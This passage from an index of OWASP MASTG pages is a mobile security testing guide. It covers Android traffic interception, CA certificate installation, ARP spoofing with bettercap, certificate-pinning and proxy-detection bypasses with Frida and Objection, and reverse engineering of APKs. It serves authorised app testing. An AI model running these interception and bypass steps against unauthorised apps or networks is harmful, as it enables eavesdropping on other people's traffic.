"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#firebasegoogle-cloud-messaging-fcmgcm","title":"Firebase/Google Cloud Messaging (FCM/GCM)","text":"Firebase Cloud Messaging (FCM), the successor to Google Cloud Messaging (GCM), is a free service offered by Google that allows you to send messages between an application server and client apps. The server and client app communicate via the FCM/GCM connection server, which handles downstream and upstream messages.
Downstream messages (push notifications) are sent from the application server to the client app; upstream messages are sent from the client app to the server.
FCM is available for Android, iOS, and Chrome. FCM currently provides two connection server protocols: HTTP and XMPP. As described in the official documentation, these protocols are implemented differently. The following example demonstrates how to intercept both protocols.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#preparation-of-test-setup","title":"Preparation of Test Setup","text":"You need to either configure iptables on your phone or use bettercap to be able to intercept traffic.
FCM can use either XMPP or HTTP to communicate with the Google backend.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#http","title":"HTTP","text":"FCM uses the ports 5228, 5229, and 5230 for HTTP communication. Usually, only port 5228 is used.
$ echo \"\nrdr pass inet proto tcp from any to any port 5228-> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5229 -> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5230 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For XMPP communication, FCM uses ports 5235 (Production) and 5236 (Testing).
$ echo \"\nrdr pass inet proto tcp from any to any port 5235-> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5236 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#intercepting-the-requests","title":"Intercepting the Requests","text":"The interception proxy must listen to the port specified in the port forwarding rule above (port 8080).
Start the app and trigger a function that uses FCM. You should see HTTP messages in your interception proxy.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#end-to-end-encryption-for-push-notifications","title":"End-to-End Encryption for Push Notifications","text":"As an additional layer of security, push notifications can be encrypted by using Capillary. Capillary is a library to simplify the sending of end-to-end (E2E) encrypted push messages from Java-based application servers to Android clients.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/","title":"Setting Up an Interception Proxy","text":"Several tools support the network analysis of applications that rely on the HTTP(S) protocol. The most important tools are the so-called interception proxies; OWASP ZAP and Burp Suite Professional are the most famous. An interception proxy gives the tester a man-in-the-middle position. This position is useful for reading and/or modifying all app requests and endpoint responses, which are used for testing Authorization, Session, Management, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-virtual-device","title":"Interception Proxy for a Virtual Device","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#setting-up-a-web-proxy-on-an-android-virtual-device-avd","title":"Setting Up a Web Proxy on an Android Virtual Device (AVD)","text":"The following procedure, which works on the Android emulator that ships with Android Studio 3.x, is for setting up an HTTP proxy on the emulator:
Configure the HTTP proxy in the emulator settings:
HTTP and HTTPS requests should now be routed over the proxy on the host computer. If not, try toggling airplane mode off and on.
A proxy for an AVD can also be configured on the command line by using the emulator command when starting an AVD. The following example starts the AVD Nexus_5X_API_23 and sets a proxy to 127.0.0.1 and port 8080.
emulator @Nexus_5X_API_23 -http-proxy 127.0.0.1:8080\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#installing-a-ca-certificate-on-the-virtual-device","title":"Installing a CA Certificate on the Virtual Device","text":"An easy way to install a CA certificate is to push the certificate to the device and add it to the certificate store via Security Settings. For example, you can install the PortSwigger (Burp) CA certificate as follows:
cacert.der
by clicking the \"CA Certificate\" button..der
to .cer
.Push the file to the emulator:
adb push cacert.cer /sdcard/\n
Navigate to Settings -> Security -> Install from SD Card.
cacert.cer
.You should then be prompted to confirm installation of the certificate (you'll also be asked to set a device PIN if you haven't already).
This installs the certificate in the user certificate store (tested on Genymotion VM). In order to place the certificate in the root store you can perform the following steps:
adb root
and adb shell
./data/misc/user/0/cacerts-added/
./system/etc/security/cacerts/
.For Android 7.0 (API level 24) and above follow the same procedure described in the \"Bypassing the Network Security Configuration\" section.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-physical-device","title":"Interception Proxy for a Physical Device","text":"The available network setup options must be evaluated first. The mobile device used for testing and the host computer running the interception proxy must be connected to the same Wi-Fi network. Use either an (existing) access point or create an ad-hoc wireless network.
Once you've configured the network and established a connection between the testing host computer and the mobile device, several steps remain.
NET::ERR_CERT_VALIDITY_TOO_LONG
errors, if the leaf certificate happens to have a validity extending a certain time (39 months in case of Chrome). This happens if the default Burp CA certificate is used, since the Burp Suite issues leaf certificates with the same validity as its CA certificate. You can circumvent this by creating your own CA certificate and import it to the Burp Suite, as explained in this blog post.After completing these steps and starting the app, the requests should show up in the interception proxy.
A video of setting up OWASP ZAP with an Android device can be found on secure.force.com.
A few other differences: from Android 8.0 (API level 26) onward, the network behavior of the app changes when HTTPS traffic is tunneled through another connection. And from Android 9 (API level 28) onward, the SSLSocket and SSLEngine will behave a little bit different in terms of error handling when something goes wrong during the handshakes.
As mentioned before, starting with Android 7.0 (API level 24), the Android OS will no longer trust user CA certificates by default, unless specified in the application. In the following section, we explain two methods to bypass this Android security control.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bypassing-the-network-security-configuration","title":"Bypassing the Network Security Configuration","text":"In this section we will present several methods to bypass Android's Network Security Configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-custom-user-certificates-to-the-network-security-configuration","title":"Adding Custom User Certificates to the Network Security Configuration","text":"There are different configurations available for the Network Security Configuration to add non-system Certificate Authorities via the src attribute:
<certificates src=[\"system\" | \"user\" | \"raw resource\"]\n overridePins=[\"true\" | \"false\"] />\n
Each certificate can be one of the following:
\"raw resource\"
is an ID pointing to a file containing X.509 certificates\"system\"
for the pre-installed system CA certificates\"user\"
for user-added CA certificatesThe CA certificates trusted by the app can be a system trusted CA as well as a user CA. Usually you will have added the certificate of your interception proxy already as additional CA in Android. Therefore we will focus on the \"user\" setting, which allows you to force the Android app to trust this certificate with the following Network Security Configuration below:
<network-security-config>\n <base-config>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </base-config>\n</network-security-config>\n
To implement this new setting you must follow the steps below:
Decompile the app using a decompilation tool like apktool:
apktool d <filename>.apk\n
Make the application trust user certificates by creating a Network Security Configuration that includes <certificates src=\"user\" />
as explained above
Go into the directory created by apktool when decompiling the app and rebuild the app using apktool. The new apk will be in the dist
directory.
apktool b\n
You need to repackage the app, as explained in the \"Repackaging\" section of the \"Reverse Engineering and Tampering\" chapter. For more details on the repackaging process you can also consult the Android developer documentation, that explains the process as a whole.
Note that even if this method is quite simple its major drawback is that you have to apply this operation for each application you want to evaluate which is additional overhead for testing.
Bear in mind that if the app you are testing has additional hardening measures, like verification of the app signature you might not be able to start the app anymore. As part of the repackaging you will sign the app with your own key and therefore the signature changes will result in triggering such checks that might lead to immediate termination of the app. You would need to identify and disable such checks either by patching them during repackaging of the app or dynamic instrumentation through Frida.
There is a python script available that automates the steps described above called Android-CertKiller. This Python script can extract the APK from an installed Android app, decompile it, make it debuggable, add a new Network Security Configuration that allows user certificates, builds and signs the new APK and installs the new APK with the SSL Bypass.
python main.py -w\n\n***************************************\nAndroid CertKiller (v0.1)\n***************************************\n\nCertKiller Wizard Mode\n---------------------------------\nList of devices attached\n4200dc72f27bc44d device\n\n---------------------------------\n\nEnter Application Package Name: nsc.android.mstg.owasp.org.android_nsc\n\nPackage: /data/app/nsc.android.mstg.owasp.org.android_nsc-1/base.apk\n\nI. Initiating APK extraction from device\n complete\n------------------------------\nI. Decompiling\n complete\n------------------------------\nI. Applying SSL bypass\n complete\n------------------------------\nI. Building New APK\n complete\n------------------------------\nI. Signing APK\n complete\n------------------------------\n\nWould you like to install the APK on your device(y/N): y\n------------------------------------\n Installing Unpinned APK\n------------------------------\nFinished\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-the-proxys-certificate-among-system-trusted-cas-using-magisk","title":"Adding the Proxy's certificate among system trusted CAs using Magisk","text":"In order to avoid the obligation of configuring the Network Security Configuration for each application, we must force the device to accept the proxy's certificate as one of the systems trusted certificates.
There is a Magisk module that will automatically add all user-installed CA certificates to the list of system trusted CAs.
Download the latest version of the module at the Github Release page, push the downloaded file over to the device and import it in the Magisk Manager's \"Module\" view by clicking on the +
button. Finally, a restart is required by Magisk Manager to let changes take effect.
From now on, any CA certificate that is installed by the user via \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Install from storage\" (location may differ) is automatically pushed into the system's trust store by this Magisk module. Reboot and verify that the CA certificate is listed in \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Trusted credentials\" (location may differ).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#manually-adding-the-proxys-certificate-among-system-trusted-cas","title":"Manually adding the Proxy's certificate among system trusted CAs","text":"Alternatively, you can follow the following steps manually in order to achieve the same result:
mount -o rw,remount /system
. If this command fails, try running the following command mount -o rw,remount -t ext4 /system
Prepare the proxy's CA certificates to match system certificates format. Export the proxy's certificates in der
format (this is the default format in Burp Suite) then run the following commands:
$ openssl x509 -inform DER -in cacert.der -out cacert.pem\n$ openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\nmv cacert.pem <hash>.0\n
Finally, copy the <hash>.0
file into the directory /system/etc/security/cacerts and then run the following command:
chmod 644 <hash>.0\n
By following the steps described above you allow any application to trust the proxy's certificate, which allows you to intercept its traffic, unless of course the application uses SSL pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#potential-obstacles","title":"Potential Obstacles","text":"Applications often implement security controls that make it more difficult to perform a security review of the application, such as root detection and certificate pinning. Ideally, you would acquire both a version of the application that has these controls enabled, and one where the controls are disabled. This allows you to analyze the proper implementation of the controls, after which you can continue with the less-secure version for further tests.
Of course, this is not always possible, and you may need to perform a black-box assessment on an application where all security controls are enabled. The section below shows you how you can circumvent certificate pinning for different applications.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#client-isolation-in-wireless-networks","title":"Client Isolation in Wireless Networks","text":"Once you have setup an interception proxy and have a MITM position you might still not be able to see anything. This might be due to restrictions in the app (see next section) but can also be due to so called client isolation in the Wi-Fi that you are connected to.
Wireless Client Isolation is a security feature that prevents wireless clients from communicating with one another. This feature is useful for guest and BYOD SSIDs adding a level of security to limit attacks and threats between devices connected to the wireless networks.
What to do if the Wi-Fi we need for testing has client isolation?
You can configure the proxy on your Android device to point to 127.0.0.1:8080, connect your phone via USB to your host computer and use adb to make a reverse port forwarding:
adb reverse tcp:8080 tcp:8080\n
Once you have done this all proxy traffic on your Android phone will be going to port 8080 on 127.0.0.1 and it will be redirected via adb to 127.0.0.1:8080 on your host computer and you will see now the traffic in your Burp. With this trick you are able to test and intercept traffic also in Wi-Fis that have client isolation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#non-proxy-aware-apps","title":"Non-Proxy Aware Apps","text":"Once you have setup an interception proxy and have a MITM position you might still not be able to see anything. This is mainly due to the following reasons:
In both scenarios you would need additional steps to finally being able to see the traffic. In the sections below we are describing two different solutions, bettercap and iptables.
You could also use an access point that is under your control to redirect the traffic, but this would require additional hardware and we focus for now on software solutions.
For both solutions you need to activate \"Support invisible proxying\" in Burp, in Proxy Tab/Options/Edit Interface.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#iptables","title":"iptables","text":"You can use iptables on the Android device to redirect all traffic to your interception proxy. The following command would redirect port 80 to your proxy running on port 8080
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination <Your-Proxy-IP>:8080\n
Verify the iptables settings and check the IP and port.
$ iptables -t nat -L\nChain PREROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain INPUT (policy ACCEPT)\ntarget prot opt source destination\n\nChain OUTPUT (policy ACCEPT)\ntarget prot opt source destination\nDNAT tcp -- anywhere anywhere tcp dpt:5288 to:<Your-Proxy-IP>:8080\n\nChain POSTROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain natctrl_nat_POSTROUTING (0 references)\ntarget prot opt source destination\n\nChain oem_nat_pre (0 references)\ntarget prot opt source destination\n
In case you want to reset the iptables configuration you can flush the rules:
iptables -t nat -F\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bettercap","title":"bettercap","text":"Read the chapter \"Testing Network Communication\" and the test case \"Simulating a Man-in-the-Middle Attack\" for further preparation and instructions for running bettercap.
The host computer where you run your proxy and the Android device must be connected to the same wireless network. Start bettercap with the following command, replacing the IP address below (X.X.X.X) with the IP address of your Android device.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#proxy-detection","title":"Proxy Detection","text":"Some mobile apps are trying to detect if a proxy is set. If that's the case they will assume that this is malicious and will not work properly.
In order to bypass such a protection mechanism you could either setup bettercap or configure iptables that don't need a proxy setup on your Android phone. A third option we didn't mention before and that is applicable in this scenario is using Frida. It is possible on Android to detect if a system proxy is set by querying the ProxyInfo
class and check the getHost() and getPort() methods. There might be various other methods to achieve the same task and you would need to decompile the APK in order to identify the actual class and method name.
Below you can find boiler plate source code for a Frida script that will help you to overload the method (in this case called isProxySet) that is verifying if a proxy is set and will always return false. Even if a proxy is now configured the app will now think that none is set as the function returns false.
setTimeout(function(){\n Java.perform(function (){\n console.log(\"[*] Script loaded\")\n\n var Proxy = Java.use(\"<package-name>.<class-name>\")\n\n Proxy.isProxySet.overload().implementation = function() {\n console.log(\"[*] isProxySet function invoked\")\n return false\n }\n });\n});\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't help.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypassing-methods","title":"Bypassing Methods","text":"There are several ways to bypass certificate pinning for a black box test, depending on the frameworks available on the device:
android sslpinning disable
command.If you have a rooted device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-rooted device):
android sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for Android for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-statically","title":"Bypass Custom Certificate Pinning Statically","text":"Somewhere in the application, both the endpoint and the certificate (or its hash) must be defined. After decompiling the application, you can search for:
grep -ri \"sha256\\|sha1\" ./smali
. Replace the identified hashes with the hash of your proxy's CA. Alternatively, if the hash is accompanied by a domain name, you can try modifying the domain name to a non-existing domain so that the original domain is not pinned. This works well on obfuscated OkHTTP implementations.find ./assets -type f \\( -iname \\*.cer -o -iname \\*.crt \\)
. Replace these files with your proxy's certificates, making sure they are in the correct format.find ./ -type f \\( -iname \\*.jks -o -iname \\*.bks \\)
. Add your proxy's certificates to the truststore and make sure they are in the correct format.Keep in mind that an app might contain files without extension. The most common file locations are assets
and res
directories, which should also be investigated.
As an example, let's say that you find an application which uses a BKS (BouncyCastle) truststore and it's stored in the file res/raw/truststore.bks
. To bypass SSL Pinning you need to add your proxy's certificate to the truststore with the command line tool keytool
. Keytool
comes with the Java SDK and the following values are needed to execute the command:
To add your proxy's certificate use the following command:
keytool -importcert -v -trustcacerts -file proxy.cer -alias aliascert -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
To list certificates in the BKS truststore use the following command:
keytool -list -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
After making these modifications, repackage the application using apktool and install it on your device.
If the application uses native libraries to implement network communication, further reverse engineering is needed. An example of such an approach can be found in the blog post Identifying the SSL Pinning logic in smali code, patching it, and reassembling the APK
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-dynamically","title":"Bypass Custom Certificate Pinning Dynamically","text":"Bypassing the pinning logic dynamically makes it more convenient as there is no need to bypass any integrity checks and it's much faster to perform trial & error attempts.
Finding the correct method to hook is typically the hardest part and can take quite some time depending on the level of obfuscation. As developers typically reuse existing libraries, it is a good approach to search for strings and license files that identify the used library. Once the library has been identified, examine the non-obfuscated source code to find methods which are suited for dynamic instrumentation.
As an example, let's say that you find an application which uses an obfuscated OkHTTP3 library. The documentation shows that the CertificatePinner.Builder
class is responsible for adding pins for specific domains. If you can modify the arguments to the Builder.add method, you can change the hashes to the correct hashes belonging to your certificate. Finding the correct method can be done in either two ways, as explained in this blog post by Jeroen Beckers:
For the Builder.add method, you can find the possible methods by running the following grep command: grep -ri java/lang/String;\\[Ljava/lang/String;)L ./
This command will search for all methods that take a string and a variable list of strings as arguments, and return a complex object. Depending on the size of the application, this may have one or multiple matches in the code.
Hook each method with Frida and print the arguments. One of them will print out a domain name and a certificate hash, after which you can modify the arguments to circumvent the implemented pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0013/","title":"Reverse Engineering Android Apps","text":"Android's openness makes it a favorable environment for reverse engineers, offering big advantages that are not available with iOS. Because Android is open-source, you can study its source code at the Android Open Source Project (AOSP) and modify the OS and its standard tools any way you want. Even on standard retail devices, it is possible to do things like activating developer mode and sideloading apps without jumping through many hoops. From the powerful tools shipping with the SDK to the wide range of available reverse engineering tools, there's a lot of niceties to make your life easier.
However, there are also a few Android-specific challenges. For example, you'll need to deal with both Java bytecode and native code. Java Native Interface (JNI) is sometimes deliberately used to confuse reverse engineers (to be fair, there are legitimate reasons for using JNI, such as improving performance or supporting legacy code). Developers sometimes use the native layer to \"hide\" data and functionality, and they may structure their apps such that execution frequently jumps between the two layers.
You'll need at least a working knowledge of both the Java-based Android environment and the Linux OS and Kernel, on which Android is based. You'll also need the right toolset to deal with both the bytecode running on the Java virtual machine and the native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/","title":"Static Analysis on Android","text":"Static analysis is a technique used to examine and evaluate the source code of a mobile application without executing it. This method is instrumental in identifying potential security vulnerabilities, coding errors, and compliance issues. Static analysis tools can scan the entire codebase automatically, making them a valuable asset for developers and security auditors.
Two good examples of static analysis tools are grep and semgrep. However, there are many other tools available, and you should choose the one that best fits your needs.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/#example-using-grep-for-manifest-analysis-in-android-apps","title":"Example: Using grep for Manifest Analysis in Android Apps","text":"One simple yet effective use of static analysis is using the grep
command-line tool to inspect the AndroidManifest.xml
file of an Android app. For example, you can extract the minimum SDK version (which indicates the lowest version of Android the app supports) with the following grep
command:
grep 'android:minSdkVersion' AndroidManifest.xml\n
This command searches for the android:minSdkVersion
attribute within the manifest file. Ensuring a higher minSdkVersion
can reduce security risks, as older versions of Android may not include the latest security features and fixes.
semgrep is a more advanced tool that can be used for pattern matching in code. It's particularly useful for identifying complex coding patterns that might lead to security vulnerabilities. For example, to find instances where a deterministic seed is used with the SecureRandom
class (which can compromise the randomness and thus the security), you can use a semgrep rule like:
rules:\n - id: insecure-securerandom-seed\n patterns:\n - pattern: new SecureRandom($SEED)\n - pattern-not: $SEED = null\n message: \"Using a deterministic seed with SecureRandom. Consider using a more secure seed.\"\n languages: [java]\n severity: WARNING\n
This rule will flag any instances in the code where SecureRandom
is initialized with a specific seed, excluding cases where the seed is null (which implies a secure random seed).
TBD
"},{"location":"MASTG/techniques/android/MASTG-TECH-0016/","title":"Disassembling Code to Smali","text":"If you want to inspect the app's smali code (instead of Java), you can open your APK in Android Studio by clicking Profile or debug APK from the \"Welcome screen\" (even if you don't intend to debug it you can take a look at the smali code).
Alternatively you can use apktool to extract and disassemble resources directly from the APK archive and disassemble Java bytecode to smali. apktool allows you to reassemble the package, which is useful for patching the app or applying changes to e.g. the Android Manifest.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0017/","title":"Decompiling Java Code","text":"In Android app security testing, if the application is based solely on Java and doesn't have any native code (C/C++ code), the reverse engineering process is relatively easy and recovers (decompiles) almost all the source code. In those cases, black-box testing (with access to the compiled binary, but not the original source code) can get pretty close to white-box testing.
Nevertheless, if the code has been purposefully obfuscated (or some tool-breaking anti-decompilation tricks have been applied), the reverse engineering process may be very time-consuming and unproductive. This also applies to applications that contain native code. They can still be reverse engineered, but the process is not automated and requires knowledge of low-level details.
If you want to look directly into Java source code on a GUI, simply open your APK using jadx or Bytecode Viewer.
Android decompilers go one step further and attempt to convert Android bytecode back into Java source code, making it more human-readable. Fortunately, Java decompilers generally handle Android bytecode well. The above mentioned tools embed, and sometimes even combine, popular free decompilers such as:
Alternatively you can use the APKLab extension for Visual Studio Code or run apkx on your APK or use the exported files from the previous tools to open the reversed source code on your preferred IDE.
In the following example we'll be using UnCrackable App for Android Level 1. First, let's install the app on a device or emulator and run it to see what the crackme is about.
Seems like we're expected to find some kind of secret code!
We're looking for a secret string stored somewhere inside the app, so the next step is to look inside. First, unzip the APK file (unzip UnCrackable-Level1.apk -d UnCrackable-Level1
) and look at the content. In the standard setup, all the Java bytecode and app data is in the file classes.dex
in the app root directory (UnCrackable-Level1/
). This file conforms to the Dalvik Executable Format (DEX), an Android-specific way of packaging Java programs. Most Java decompilers take plain class files or JARs as input, so you need to convert the classes.dex file into a JAR first. You can do this with dex2jar
or enjarify
.
Once you have a JAR file, you can use any free decompiler to produce Java code. In this example, we'll use the CFR decompiler. CFR releases are available on the author's website. CFR was released under an MIT license, so you can use it freely even though its source code is not available.
The easiest way to run CFR is through apkx, which also packages dex2jar
and automates extraction, conversion, and decompilation. Run it on the APK and you should find the decompiled sources in the directory Uncrackable-Level1/src
. To view the sources, a simple text editor (preferably with syntax highlighting) is fine, but loading the code into a Java IDE makes navigation easier. Let's import the code into IntelliJ, which also provides on-device debugging functionality.
Open IntelliJ and select \"Android\" as the project type in the left tab of the \"New Project\" dialog. Enter \"Uncrackable1\" as the application name and \"vantagepoint.sg\" as the company name. This results in the package name \"sg.vantagepoint.uncrackable1\", which matches the original package name. Using a matching package name is important if you want to attach the debugger to the running app later on because IntelliJ uses the package name to identify the correct process.
In the next dialog, pick any API number; you don't actually want to compile the project, so the number doesn't matter. Click \"next\" and choose \"Add no Activity\", then click \"finish\".
Once you have created the project, expand the \"1: Project\" view on the left and navigate to the folder app/src/main/java
. Right-click and delete the default package \"sg.vantagepoint.uncrackable1\" created by IntelliJ.
Now, open the Uncrackable-Level1/src
directory in a file browser and drag the sg
directory into the now empty Java
folder in the IntelliJ project view (hold the \"alt\" key to copy the folder instead of moving it).
You'll end up with a structure that resembles the original Android Studio project from which the app was built.
See the section \"Reviewing Decompiled Java Code\" below to learn on how to proceed when inspecting the decompiled Java code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/","title":"Disassembling Native Code","text":"Dalvik and ART both support the Java Native Interface (JNI), which defines a way for Java code to interact with native code written in C/C++. As on other Linux-based operating systems, native code is packaged (compiled) into ELF dynamic libraries (*.so), which the Android app loads at runtime via the System.load
method. However, instead of relying on widely used C libraries (such as glibc), Android binaries are built against a custom libc named Bionic. Bionic adds support for important Android-specific services such as system properties and logging, and it is not fully POSIX-compatible.
When reversing an Android application containing native code, we need to understand a couple of data structures related to the JNI bridge between Java and native code. From the reversing perspective, we need to be aware of two key data structures: JavaVM
and JNIEnv
. Both of them are pointers to pointers to function tables:
JavaVM
provides an interface to invoke functions for creating and destroying a JavaVM. Android allows only one JavaVM
per process and is not really relevant for our reversing purposes.JNIEnv
provides access to most of the JNI functions which are accessible at a fixed offset through the JNIEnv
pointer. This JNIEnv
pointer is the first parameter passed to every JNI function. We will discuss this concept again with the help of an example later in this chapter.It is worth highlighting that analyzing disassembled native code is much more challenging than disassembled Java code. When reversing the native code in an Android application we will need a disassembler.
In the next example we'll reverse the HelloWorld-JNI.apk from the OWASP MASTG repository. Installing and running it in an emulator or Android device is optional.
wget https://github.com/OWASP/owasp-mastg/raw/master/Samples/Android/01_HelloWorld-JNI/HelloWord-JNI.apk\n
This app is not exactly spectacular, all it does is show a label with the text \"Hello from C++\". This is the app Android generates by default when you create a new project with C/C++ support, which is just enough to show the basic principles of JNI calls.
Decompile the APK with apkx
.
$ apkx HelloWord-JNI.apk\nExtracting HelloWord-JNI.apk to HelloWord-JNI\nConverting: classes.dex -> classes.jar (dex2jar)\ndex2jar HelloWord-JNI/classes.dex -> HelloWord-JNI/classes.jar\nDecompiling to HelloWord-JNI/src (cfr)\n
This extracts the source code into the HelloWord-JNI/src
directory. The main activity is found in the file HelloWord-JNI/src/sg/vantagepoint/helloworldjni/MainActivity.java
. The \"Hello World\" text view is populated in the onCreate
method:
public class MainActivity\nextends AppCompatActivity {\n static {\n System.loadLibrary(\"native-lib\");\n }\n\n @Override\n protected void onCreate(Bundle bundle) {\n super.onCreate(bundle);\n this.setContentView(2130968603);\n ((TextView)this.findViewById(2131427422)).setText((CharSequence)this. \\\n stringFromJNI());\n }\n\n public native String stringFromJNI();\n}\n
Note the declaration of public native String stringFromJNI
at the bottom. The keyword \"native\" tells the Java compiler that this method is implemented in a native language. The corresponding function is resolved during runtime, but only if a native library that exports a global symbol with the expected signature is loaded (signatures comprise a package name, class name, and method name). In this example, this requirement is satisfied by the following C or C++ function:
JNIEXPORT jstring JNICALL Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI(JNIEnv *env, jobject)\n
So where is the native implementation of this function? If you look into the \"lib\" directory of the unzipped APK archive, you'll see several subdirectories (one per supported processor architecture), each of them containing a version of the native library, in this case libnative-lib.so
. When System.loadLibrary
is called, the loader selects the correct version based on the device that the app is running on. Before moving ahead, pay attention to the first parameter passed to the current JNI function. It is the same JNIEnv
data structure which was discussed earlier in this section.
Following the naming convention mentioned above, you can expect the library to export a symbol called Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI
. On Linux systems, you can retrieve the list of symbols with readelf
(included in GNU binutils) or nm
. Do this on macOS with the greadelf
tool, which you can install via Macports or Homebrew. The following example uses greadelf
:
$ greadelf -W -s libnative-lib.so | grep Java\n 3: 00004e49 112 FUNC GLOBAL DEFAULT 11 Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI\n
You can also see this using radare2's rabin2:
$ rabin2 -s HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so | grep -i Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
This is the native function that eventually gets executed when the stringFromJNI
native method is called.
To disassemble the code, you can load libnative-lib.so
into any disassembler that understands ELF binaries (i.e., any disassembler). If the app ships with binaries for different architectures, you can theoretically pick the architecture you're most familiar with, as long as it is compatible with the disassembler. Each version is compiled from the same source and implements the same functionality. However, if you're planning to debug the library on a live device later, it's usually wise to pick an ARM build.
To support both older and newer ARM processors, Android apps ship with multiple ARM builds compiled for different Application Binary Interface (ABI) versions. The ABI defines how the application's machine code is supposed to interact with the system at runtime. The following ABIs are supported:
Most disassemblers can handle any of those architectures. Below, we'll be viewing the armeabi-v7a version (located in HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
) in radare2 and in IDA Pro. See the section \"Reviewing Disassembled Native Code\" below to learn on how to proceed when inspecting the disassembled native code.
To open the file in radare2 you only have to run r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
. The chapter \"Android Basic Security Testing\" already introduced radare2. Remember that you can use the flag -A
to run the aaa
command right after loading the binary in order to analyze all referenced code.
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x00001dcf (aav)\n[x] 0x00000000-0x00001dcf in 0x0-0x1dcf (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n -- Print the contents of the current block with the 'p' command\n[0x00000e3c]>\n
Note that for bigger binaries, starting directly with the flag -A
might be very time consuming as well as unnecessary. Depending on your purpose, you may open the binary without this option and then apply a less complex analysis like aa
or a more concrete type of analysis such as the ones offered in aa
(basic analysis of all functions) or aac
(analyze function calls). Remember to always type ?
to get the help or attach it to commands to see even more command or options. For example, if you enter aa?
you'll get the full list of analysis commands.
